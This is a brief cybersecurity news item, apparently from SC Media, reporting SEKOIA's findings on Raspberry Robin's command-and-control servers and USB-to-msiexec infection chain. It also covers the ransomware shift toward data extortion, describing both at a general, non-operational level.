Numerous threat actors could repurpose Raspberry Robin, also known as QNAP worm, for their own attacks, reports The Hacker News.
Raspberry Robin, which has been attributed to DEV-0856, was discovered by SEKOIA researchers to have at least eight Linode-based virtual private servers acting as a second command-and-control layer on top of compromised QNAP network-attached storage devices.
Such attack infrastructure facilitates an attack chain that commences with the launch of a Windows shortcut file from an inserted USB drive that would enable the msiexec utility and later download the primary obfuscated Raspberry Robin payload. Researchers noted that malware retrieval through HTTP requests sent by msiexec allows request hijacking for other rogue MSI payload downloads.
"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," said SEKOIA, which added that the Raspberry Robin domain could still be reused for other malicious activities.
Data extortion has been increasingly leveraged by ransomware operations instead of data encryption, with the change in attack techniques fueled by improved ransomware detection systems and stronger law enforcement crackdowns on ransomware gangs, TechRepublic reports.
Real-world Insights from a Sophos Threat Analyst: It’s Great You Have a Firewall, But Here’s Why You Shouldn’t Skip Over MDR
Revolutionizing the essentials: Friction-minimizing approaches to overcoming advanced account takeover (ATO)
Evening the Odds Against Overpowered Cyber Adversaries: A Business Impact Analysis
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news